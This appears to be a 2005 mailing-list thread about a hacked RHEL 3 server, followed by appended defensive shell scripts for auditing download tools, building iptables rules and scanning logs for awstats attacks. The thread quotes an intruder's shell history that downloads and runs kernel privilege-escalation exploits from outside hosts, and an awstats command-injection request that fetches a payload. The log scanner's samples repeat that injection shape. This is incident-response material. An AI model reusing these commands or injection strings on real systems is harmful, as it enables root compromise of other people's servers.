
Patched kernel still vulnerable!? (was Re: Hacked...)



Hi all,

This might not apply to RHEL 4, as the machine in question is still running RHEL 3 update 4, but just in case this might apply...

As I was tracking down what happened to my machine, I followed up and researched the first few commands that were in the .bash_history:

cd /var/tmp
wget http://www.albany-toyota.co.nz/release/elflbl
chmod 777 elflbl
./elflbl
id
./elflbl -n3
id
./elflbl -f switch
id
wget http://www.freewebs.com/swcbreaker/xpl/uselib24
chmod 777 uselib24
./uselib24


From what I was able to find, elflbl exploits a vulnerability in uselib which was supposedly fixed on Jan 17, and which I installed on Jan 20. The first traces of the break-in were on Feb 12 (even though the log file shows awstats hacked on Mar 5???)


https://rhn.redhat.com/network/errata/details/index.pxt?eid=2656
RHSA-2005:043 - Security Advisory


Synopsis
Updated kernel packages fix security vulnerabilities

Issued:  2005-01-17
Updated: 2005-01-17

Topic
Updated kernel packages that fix several security issues in Red Hat
Enterprise Linux 3 are now available.

Description
The Linux kernel handles the basic functions of the operating system.

This advisory includes fixes for several security issues:

iSEC Security Research discovered a VMA handling flaw in the uselib(2)
system call of the Linux kernel. A local user could make use of this
flaw to gain elevated (root) privileges. The Common Vulnerabilities and
Exposures project (cve.mitre.org) has assigned the name CAN-2004-1235 to
this issue.


So... is there still a security hole in the kernel that elflbl exploits?

I have a copy of the elflbl executable (and of the uselib24) if they are not available from the above URLs.

BTW,

I installed mod_security http://www.modsecurity.org/ with rules from http://www.gotroot.com/mod_security+rules

and upgraded awstats to the latest version...

and as I mentioned previously, wget, curl, lynx, telnet are all aliased to this little shell script (the originals renamed so I can use them in my scripts)

{ echo $0 $* ; echo ps; ps -egxuwc; echo who; who -aH; echo set; set; echo ; } | mail -s $0 myemail gmail com

so that I am informed of any unauthorized use of wget/curl/lynx/telnet


I still do not have a firewall configured, since I am still not quite sure how to allow needed services. For example, I have a backup client program (Dantz Retrospect) and a FileMaker Pro server running on the system, which use their well-known ports, but when doing lsof it shows that there are other ports in use by these, so I am not sure exactly how to do this... I've asked before, and got some answers, but did not really follow up and install/configure the firewall...


-avi



At 22:45 -0800 03/08/2005, Aviram Carmi wrote:
Thanks,

it was awstats:

200.175.36.178 - - [05/Mar/2005:19:48:35 -0800] "GET /awstats//awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/var/tmp;%20%20wget%20http://paginas.terra.com.br/informatica/swcrew/r0nin%20;echo%20__fim__;echo%20| HTTP/1.1" 200 598 "-" "-"


-avi




At 00:28 -0600 03/09/2005, Thomas Cameron wrote:
Look in /var/log/http/*. I am betting that there is something in one of the logs (probably error_log) that will catch your eye.

You're running something PHP-ish, aren't you? Or maybe awstats?

Thomas

--


Aviram Carmi
Owner
Executive Vice President, Technology

Over TheNet (R)
601 Daily Drive Suite #226 Camarillo, CA 93010-5840


http://www.otn.com/   Building Profitable Web Sites Today
(805) 384-1144 Voice  (805) 384-9111 FAX

(C) Copyright 2004, Over TheNet (R) All rights reserved.
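The one-line mail alias described in the message above is a good idea; below is a fuller version of the same technique, added here as an example (it is not the poster's script). It assumes the real binaries have been renamed with a ".real" suffix and the wrapper installed under the names wget, curl, lynx and telnet; the log path, the DLTOOL_* environment variables and the "suspicious" heuristic (running from a world-writable scratch directory, or fetching from a bare IP address, the two shapes visible in the .bash_history quoted above) are all assumptions of this example. The wrapper records who ran the tool and from which parent process, mails a snapshot if asked, and then execs the real tool so that legitimate scripts keep working:

```shell
#!/bin/sh
# Added example, not the list poster's alias script. Installed as wget, curl,
# lynx and telnet after the real binaries are renamed with a ".real" suffix
# (assumed convention). Writes an audit record, mails it when DLTOOL_ALERT_TO
# is set, then execs the real tool.

REAL_SUFFIX=".real"
LOGFILE="${DLTOOL_LOGFILE:-/var/log/dltool-audit.log}"   # assumed path; override via env
ALERT_TO="${DLTOOL_ALERT_TO:-}"                          # empty: log only, no mail

# is_suspicious CWD ARG... : heuristic for the shapes seen in this incident:
# running from a world-writable scratch directory, or fetching from a bare IP.
is_suspicious() {
    cwd=$1; shift
    case "$cwd" in /tmp|/var/tmp|/dev/shm) return 0 ;; esac
    for a in "$@"; do
        case "$a" in
            http://[0-9]*.[0-9]*.[0-9]*.[0-9]*|https://[0-9]*.[0-9]*.[0-9]*.[0-9]*|ftp://[0-9]*.[0-9]*.[0-9]*.[0-9]*)
                return 0 ;;
        esac
    done
    return 1
}

# build_report TOOL ARG... : one tab-separated audit line: who, from which
# parent process and tty, in which directory, with which arguments.
build_report() {
    tool=$1; shift
    ts=$(date -u +%Y-%m-%dT%H:%M:%SZ)
    uid=$(id -u 2>/dev/null) || uid='?'
    user=$(id -un 2>/dev/null) || user='?'
    parent=$(ps -o comm= -p "$PPID" 2>/dev/null | tr -d ' ')
    [ -n "$parent" ] || parent='?'
    t=$(tty 2>/dev/null) || t='notty'
    if is_suspicious "$PWD" "$@"; then flag=SUSPICIOUS; else flag=ok; fi
    printf '%s\t%s\tflag=%s\tuid=%s\tuser=%s\tppid=%s\tparent=%s\ttty=%s\tcwd=%s\targs=%s\n' \
        "$ts" "$tool" "$flag" "$uid" "$user" "$PPID" "$parent" "$t" "$PWD" "$*"
}

# record_and_alert TOOL ARG... : append to the audit log, copy to syslog, and
# mail a fuller snapshot (process table and logins, as the poster's script
# did) when an address is configured.
record_and_alert() {
    rec=$(build_report "$@")
    printf '%s\n' "$rec" >> "$LOGFILE"
    logger -t dltool-audit "$rec" 2>/dev/null || true
    if [ -n "$ALERT_TO" ]; then
        { printf '%s\n\n' "$rec"; ps -eo pid,ppid,user,tty,comm; who -a; } \
            | mail -s "dltool-audit: $1" "$ALERT_TO"
    fi
}

# Act as a wrapper only when invoked under a watched name; run or sourced
# under any other name, the file just defines the functions above.
tool=$(basename "$0")
case "$tool" in
    wget|curl|lynx|telnet)
        record_and_alert "$tool" "$@"
        real=$(command -v "$tool$REAL_SUFFIX") || { echo "$tool: $tool$REAL_SUFFIX not found" >&2; exit 127; }
        exec "$real" "$@"
        ;;
esac
```

Because the wrapper execs the renamed original, cron jobs and scripts that legitimately call wget still work, while every call leaves an audit line with the parent process (a download started by httpd's CGI, as in the awstats hit, stands out immediately). The "flag" field is a hint for filtering, not a verdict.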
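On the firewall question: the "other ports" lsof shows for the backup and database services are usually outbound or established connections and loopback-only listeners, neither of which needs an INPUT rule. The following is an added example (not from the thread) that reduces "lsof -i -P -n" output to the inventory a host firewall actually needs and prints the iptables commands it implies, as text for review rather than applying them. The sample lsof output, the process names and the port numbers in it are constructed for the example, not taken from the poster's machine:

```shell
#!/bin/sh
# Added example, not from the thread. Turns "lsof -i -P -n" output into a list
# of externally reachable listeners and an allow-list INPUT policy (as text).

# listening_ports < LSOF_OUTPUT : prints "PROTO PORT COMMAND", deduplicated.
# Fields are located by content rather than column number because the
# SIZE/OFF column is blank or absent depending on the lsof version.
listening_ports() {
    awk '
    {
        proto = ""; name = ""; state = ""
        for (i = 1; i <= NF; i++)
            if ($i == "TCP" || $i == "UDP") { proto = $i; name = $(i + 1); state = $(i + 2) }
        if (proto == "") next                     # header or non-socket line
        if (name ~ /->/) next                     # established/outbound connection, not a listener
        if (proto == "TCP" && state != "(LISTEN)") next
        addr = name; sub(/:[^:]*$/, "", addr)     # everything before the last colon
        if (addr == "127.0.0.1" || addr == "[::1]" || addr == "localhost") next
        port = name; sub(/.*:/, "", port)
        print proto, port, $1
    }' | sort -u
}

# iptables_rules_from_ports < "PROTO PORT COMMAND" lines : emits an allow-list
# policy for review; nothing is applied.
iptables_rules_from_ports() {
    echo 'iptables -F INPUT'
    echo 'iptables -A INPUT -i lo -j ACCEPT'
    echo 'iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT'
    awk '{ printf "iptables -A INPUT -p %s --dport %s -j ACCEPT   # %s\n", tolower($1), $2, $3 }'
    echo 'iptables -A INPUT -j DROP'
}

# sample_lsof : constructed "lsof -i -P -n" output for a box like the poster's;
# process names and the backup/database ports are assumed, not from the thread.
sample_lsof() {
    cat <<'EOF'
COMMAND       PID     USER   FD   TYPE DEVICE SIZE NODE NAME
httpd        1203     root    3u  IPv4   5321      TCP *:80 (LISTEN)
httpd        1203     root    4u  IPv4   5322      TCP *:443 (LISTEN)
sshd         1011     root    3u  IPv4   4410      TCP *:22 (LISTEN)
sshd         2299     root    4u  IPv4   9902      TCP 192.0.2.5:22->198.51.100.20:51234 (ESTABLISHED)
retroclient  1330     root    5u  IPv4   6001      TCP *:497 (LISTEN)
retroclient  1330     root    6u  IPv4   6002      UDP *:497
fmserverd    1402 fmsadmin    7u  IPv4   7100      TCP *:5003 (LISTEN)
fmserverd    1402 fmsadmin    8u  IPv4   7101      TCP 127.0.0.1:16000 (LISTEN)
fmserverd    1402 fmsadmin    9u  IPv4   7102      TCP 192.0.2.5:40112->192.0.2.9:389 (ESTABLISHED)
EOF
}

# Stand-alone run: the inventory, then the rule set it implies.
sample_lsof | listening_ports
sample_lsof | listening_ports | iptables_rules_from_ports
```

Run against the real box, replace sample_lsof with "lsof -i -P -n" and review the generated list before applying it; the ESTABLISHED,RELATED rule is what lets the backup and database services keep the outbound connections lsof showed without opening their ports inbound.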
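The awstats log line quoted above (configdir=|echo ... wget ... |) is easy to hunt for across the rest of the access logs once the query string is URL-decoded, which matters because the pipe can just as well arrive encoded as %7C. This is an added example (not from the thread) that scans an Apache combined-format access log for awstats.pl requests whose configdir parameter carries shell metacharacters and prints the client, timestamp and decoded value for each hit. The sample log lines are constructed in the shape of the quoted hit, with made-up addresses and host names:

```shell
#!/bin/sh
# Added example, not from the thread. Reports awstats.pl requests whose
# configdir parameter is being used to run commands instead of naming a directory.

# scan_awstats_log FILE : one line per hit (client, timestamp, decoded value);
# prints nothing for a clean log.
scan_awstats_log() {
    awk '
    function hexval(c) { return index("0123456789abcdef", tolower(c)) - 1 }
    # Percent-decoding done here so the check sees what the CGI saw, not the
    # encoded form.
    function urldecode(s,    out, c) {
        out = ""
        while (length(s) > 0) {
            c = substr(s, 1, 1)
            if (c == "%" && substr(s, 2, 2) ~ /^[0-9A-Fa-f][0-9A-Fa-f]$/) {
                out = out sprintf("%c", hexval(substr(s, 2, 1)) * 16 + hexval(substr(s, 3, 1)))
                s = substr(s, 4)
            } else {
                out = out (c == "+" ? " " : c)
                s = substr(s, 2)
            }
        }
        return out
    }
    # Combined log format split on whitespace: $1 client, $4 "[timestamp", $7 path?query.
    $7 ~ /awstats\.pl[?]/ && $7 ~ /configdir=/ {
        q = $7; sub(/^[^?]*[?]/, "", q)
        n = split(q, kv, "&")
        for (i = 1; i <= n; i++) {
            if (kv[i] ~ /^configdir=/) {
                v = urldecode(substr(kv[i], 11))
                # A real configdir is a directory path; a leading pipe or any
                # shell metacharacter means the parameter carries a command.
                if (v ~ /^[ \t]*\|/ || v ~ /[;|`$]/) {
                    ts = $4; sub(/^\[/, "", ts)
                    printf "%s\t%s\t%s\n", $1, ts, v
                }
            }
        }
    }' "$1"
}

# sample_access_log : constructed lines in the shape of the quoted hit
# (addresses, host and file names are made up), plus benign traffic that
# must not match.
sample_access_log() {
    cat <<'EOF'
198.51.100.7 - - [05/Mar/2005:19:48:35 -0800] "GET /awstats//awstats.pl?configdir=|echo%20;echo%20__x__;%20cd%20/var/tmp;%20wget%20http://example.invalid/r0nin%20;echo%20| HTTP/1.1" 200 598 "-" "-"
198.51.100.8 - - [05/Mar/2005:19:52:10 -0800] "GET /awstats/awstats.pl?configdir=%7Cid%7C&config=www.example.com HTTP/1.1" 200 601 "-" "-"
192.0.2.10 - - [05/Mar/2005:20:01:02 -0800] "GET /awstats/awstats.pl?config=www.example.com&configdir=/etc/awstats HTTP/1.1" 200 12345 "-" "Mozilla/4.0"
192.0.2.11 - - [05/Mar/2005:20:02:02 -0800] "GET /index.html HTTP/1.1" 200 100 "-" "Mozilla/4.0"
EOF
}

# Stand-alone run on the constructed sample.
tmp=$(mktemp)
sample_access_log > "$tmp"
scan_awstats_log "$tmp"
rm -f "$tmp"
```

Running this over the rotated access logs back to January would show whether the Mar 5 request was the first use of the awstats hole or only the first one noticed, which bears directly on the Feb 12 traces mentioned above.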

